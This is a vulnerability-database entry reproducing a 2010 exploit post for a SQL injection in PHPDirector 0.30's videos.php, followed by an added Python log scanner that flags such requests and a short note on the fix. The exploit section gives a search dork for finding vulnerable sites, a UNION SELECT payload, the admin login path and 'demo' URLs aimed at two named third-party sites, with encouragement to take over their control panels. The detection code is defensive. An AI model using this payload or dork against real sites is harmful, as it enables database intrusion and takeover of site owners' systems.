PHPDirector 0.30 remote SQL injection

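Vulnerability ID 1050534 Vulnerability type
Published 2010-06-30 Updated 2010-06-30
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2010060127
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit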

======================================================================
PHPDirector 0.30  (videos.php) SQL Injection Vulnerability           #
======================================================================
# Date               : 29/06/2010                                    #
# Author             : Mr-AbdoX                                      #
# Emails             : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com             #
# My web Sites       : http://Sec-Eviles.com/vb & http://Arspam.com/ #
# Script home        : www.phpdirector.co.uk/                        #
# Tested on          : Linux & Windows                               #
=================Exploit==============================================

Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ]

[~] ExploiT [~]

http://www.site.com/videos.php?id=[SQL]

union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--


[~]  ConTroL Panel (admin login) [~]

http://www.site.com/login.php


[~] demo [~]



http://www.onevent.biz/paramore/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

http://www.videoindirizle.com/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

enjoy in control panel Like U WanT  :p



Don't  Forget greetz Me...

Peace


[~] GreetZ To [~]

The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz
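
A detection check for the request shape shown in the advisory, as an added example that is not part of the original post or of PHPDirector: it scans web access-log lines for `videos.php` requests whose `id` parameter is not a plain integer. The combined log format, the assumption that legitimate ids are non-negative integers, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments that have no place in a numeric video id
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|@@version|--|/\*", re.I | re.S)

def classify(line):
    """Return 'ok', 'non-numeric-id', 'sqli', or None for unrelated lines."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/videos.php"):
        return None
    # parse_qs decodes %XX and turns '+' into a space, as PHP does for $_GET
    values = parse_qs(url.query, keep_blank_values=True).get("id")
    if values is None:
        return None
    if any(SQLI_RE.search(v) for v in values):
        return "sqli"
    # Assumption: legitimate ids are non-negative integers
    if any(not re.fullmatch(r"\d+", v) for v in values):
        return "non-numeric-id"
    return "ok"

def scan(lines):
    """Return (client address, verdict) for every suspicious videos.php request."""
    return [(line.split()[0], v) for line in lines
            if (v := classify(line)) not in (None, "ok")]

SAMPLE_LOG = [  # constructed lines, not real traffic
    '192.0.2.10 - - [30/Jun/2010:10:00:01 +0000] "GET /videos.php?id=56 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Jun/2010:10:00:07 +0000] "GET /videos.php?id=-56+union+select'
    '+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- HTTP/1.1" 200 4987',
    '192.0.2.44 - - [30/Jun/2010:10:00:09 +0000] "GET /videos.php?id=1%20UnIoN%20SeLeCt%201,2 HTTP/1.1" 200 4987',
    "192.0.2.61 - - [30/Jun/2010:10:01:12 +0000] \"GET /videos.php?id=56' HTTP/1.1\" 500 312",
    '192.0.2.10 - - [30/Jun/2010:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

The same integer-only rule is the fix on the application side: cast or validate `id` before it reaches the query, and bind it as a parameter instead of concatenating it.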